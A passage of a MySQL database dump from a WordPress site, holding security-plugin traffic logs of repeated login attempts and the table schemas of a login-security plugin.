5.0)\"}','AZgeHRTlwrUtVPO2khLmJsnS',0,1629883030.1758,106,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','LS1lFi4HWr08ohub2k9RPqzj',0,1629883030.7445,89,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','zaDpWCkuINQ43FU7L1eTiyht',0,1629883091.3864,143,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','g2qkYF4yAu3PRNaQBrGs8wxW',0,1629883152.6851,142,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','7M9mn2ahLXtyTPGpjoOD8JS0',0,1629883213.2891,165,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','r2FEDfwkispR5hNqAQOaYTKd',0,1629883274.8808,113,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','EpeRwvaot6mynLiVM5cQWDZJ',0,1629883335.2429,130,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','X6NeTJ4nFgEOxtcu0lCVadmG',0,1629883396.1715,112,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3LSGqihxaH6rAWE7uZYb4RP9',0,1629883457.5221,139,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','MN0lZ9FbjkHwEydpvxKXnaBf',0,1629883518.1184,149,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','pT6jWdh5PUkxiwGKbLsRaZ4e',0,1629883580.9864,111,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Wbg27D9Uls3XHdfJFVipABw0',0,1629883640.2763,357,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','dNb30xp7rXDVCJImchE9U4ZR',0,1629883640.4253,208,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','7L3rEJtH8Rle15Wq4MPDbQy0',0,1629883701.1599,555,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bnjKLZzdQxTRFJa2yC5A6WYM',0,1629883762.3295,125,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','NF63UjzGB2gVRpHycDQTYfvX',0,1629883823.1771,349,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','No4DS6x7sPIYlCqh1FGgW2dQ',0,1629883884.6538,252,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZVvU6KijSsW2n7Twx5lyebPr',0,1629883945.1461,102,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','wzD4o72aVcFCni83mOZEItLU',0,1629884006.1171,101,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','wuxJQemM6l9SPkjh1WKd5nA4',0,1629884067.1299,105,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZxaV6BHEYfkTmNlcD1QKpF4X',0,1629884128.6360,120,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','8tKemCkWoa4TPwQOgz0y3vrY',0,1629884189.8411,150,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','N1qwoY9C7T8QFcvRPegAJEtL',0,1629884190.6443,98,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','L9FAhO6rge3HDt0IqN8MuxQd',0,1629884250.2003,138,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','tQcU1ywHkdCpOmA8JvS0fLnI',0,1629884311.8301,111,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ueRZ3Xl0GkSKNLoA9dqy8b64',0,1629884375.1294,181,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','C4nWkIduD0YNqmSpxhMAE83e',0,1629884433.2693,98,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','W5rAYZwNzIPSvXy6BmJpej4n',0,1629884494.8923,124,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','0PDiuWSmK2j6t3RYQvXoCIks',0,1629884496.4223,87,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','JMtFa3NK6e1YXDmWrzUOjRs2',0,1629884557.3649,114,'','POST',404,0,700,0,1,'',0),('117.203.118.201',1976268489,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','OPGvnHc40aYjVQoUkJwKZ1Mt',0,1629884616.2889,94,'','POST',404,0,700,0,1,'',0),('142.54.188.74',2385951818,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','5d1FjpltQgIvYO0bezZ2nfa4',0,1629884991.5817,168,'','POST',403,0,600,0,1,'',0),('173.208.244.93',2916152413,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','gelstHWnPZrU9pT405hXdLF1',0,1629885061.6934,113,'','POST',403,0,600,0,1,'',0),('192.151.145.141',3231158669,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','VvjKJ09lwd32tureokNcmP6z',0,1629885085.7477,123,'','POST',403,0,600,0,1,'',0),('142.54.181.60',2385950012,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','LHrlmnst1Nqwyp45AOCif2uB',0,1629885192.7192,130,'','POST',403,0,600,0,1,'',0),('173.208.244.93',2916152413,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','bIq9KPigQnOAL1DazX6MuChJ',0,1629889090.5122,110,'','POST',403,0,600,0,1,'',0),('198.204.225.194',3335315906,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','CPOISMlvJ4qFHUbLYsafe76n',0,1629889349.3707,107,'','POST',403,0,600,0,1,'',0),('69.30.225.100',1159651684,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','IFcfDU4Q1TwCZWepEAvH8Rgt',0,1629889569.8408,153,'','POST',403,0,600,0,1,'',0),('208.110.85.68',3496891716,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','m74jqtfGduRJPL8c9x0DBg5O',0,1629889698.1625,143,'','POST',403,0,600,0,1,'',0),('69.30.225.100',1159651684,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','gOAL3oxcKyD8fFbQG6tuzn7B',0,1629889977.6034,111,'','POST',403,0,600,0,1,'',0),('107.150.59.246',1805007862,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Trident\\/7.0; rv:11.0) like Gecko\"}','Wio8Hpv6X5KTxwGPMIBZYzl9',0,1629892643.3904,143,'','POST',403,0,600,0,1,'',0),('69.30.225.100',1159651684,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','VLaOihQIfp93CJwAPDlyW1eS',0,1629892888.6227,129,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','ZTR7dEy9MOcHp4WeL5g2m0jv',0,1629892929.9558,129,'','POST',403,0,600,0,1,'',0),('192.151.144.59',3231158331,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','K60qUBJTw5dF3YNhaC4bDPW7',0,1629893044.8910,115,'','POST',403,0,600,0,1,'',0),('107.150.59.246',1805007862,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','vjtG1i6Peudy4mLaUVJINSEZ',0,1629893121.2081,144,'','POST',403,0,600,0,1,'',0),('69.30.225.100',1159651684,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','fYx2qCc1Fi0QpA7BsZ9Rrtkw',0,1629896704.6284,147,'','POST',403,0,600,0,1,'',0),('142.54.181.60',2385950012,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','eiMtSs4fHXhJrZUE1maKjwFO',0,1629896795.5512,110,'','POST',403,0,600,0,1,'',0),('69.30.225.100',1159651684,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','eUguqNfExVXb4YC3l1czHDdZ',0,1629896886.2240,136,'','POST',403,0,600,0,1,'',0),('198.204.225.194',3335315906,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','SbaTtz2wMPFgCeN8uB7yIKoi',0,1629897154.2950,111,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1\"}','LJmgvfbQYcTU6hX4w0WPAuk2',0,1629897181.1001,126,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','UQHFNL90EWh2DToScAyqVl8K',0,1629897254.5474,123,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','TSOEscNuhBq3W9Af4r0Uekjz',0,1629897267.1328,124,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','h2ycT46kmD3s0aRU7WO9PgHM',0,1629897283.0286,139,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','LocixnDrPjT2d5U8qStsE9lu',0,1629897303.6478,274,'','POST',403,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?action=lostpassword','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','ErLkojMxW9OdTQcRZK20ebSh',0,1629897305.8612,96,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?action=lostpassword','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','yRzUZjtfJL0adPBHSrcl7Qqu',0,1629897319.3791,98,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?action=lostpassword','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','y6x2kspl7jMvQJfYdmKWwerb',0,1629897320.2313,79,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?action=lostpassword','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','uVEpgorXHshY2LmtzFODU06Q',0,1629897320.8714,100,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?action=lostpassword','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','thb5u47EnZ3HRG9feaC6wrc2',0,1629897321.1843,91,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/favicon.ico','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-admin\\/setup-config.php?step=2\"}','bo5kmuDPqjUWr6E0GhYtyw3O',0,1629899045.1826,590,'','GET',500,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-admin\\/install.php?language=en_US\"}','P5H2tr70WX3uCJxsmcNfVkLM',0,1629899047.6200,88,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-admin\\/install.php?language=en_US\"}','kHbh8VxdQmAYFIL1JMTWgtai',0,1629899050.3115,91,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/favicon.ico','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/wp-login.php\"}','syiF5VUI19qfZ7eKL6HRnPjT',0,1629899050.5300,669,'','GET',500,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/favicon.ico','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/\"}','pt3G9an7lCLYukBTIA0JWFy2',0,1629899099.9660,791,'','GET',500,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/blogs/the-key-things-to-know-about-drug-detoxing','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/\"}','YifFeqWBVcQN8C1In6thglpv',0,1629899151.9789,622,'','GET',500,0,600,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/favicon.ico','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\",\"2\":\"https:\\/\\/www.westonspirit.org.uk\\/blogs\\/the-key-things-to-know-about-drug-detoxing\"}','vB9iwnZ1hNjSQHIRVa7zp85D',0,1629899152.7971,779,'','GET',500,0,600,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'admin','2021-08-06 09:11:24','1000-10-10 10:00:00','185.175.113.72','',''),(2,1,'admin','2021-08-19 14:01:49','1000-10-10 10:00:00','185.175.113.72','',''),(3,1,'admin','2021-08-23 21:53:51','1000-10-10 10:00:00','103.70.171.66','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
